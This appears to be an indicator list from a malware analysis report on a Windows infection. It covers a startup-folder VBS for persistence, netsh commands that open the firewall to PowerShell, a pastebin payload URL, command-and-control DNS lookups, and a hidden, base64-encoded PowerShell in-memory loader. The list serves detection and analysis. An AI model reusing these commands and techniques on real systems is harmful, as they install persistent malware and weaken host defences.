Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
- https://pastebin.com/raw/uwegtu7z
- %TEMP%\fud.vbs
- %TEMP%\little registry cleaner.lnk
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- DNS ASK em######momoody55.d2dns.net
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\Fud.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAt...' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE' (with hidden window)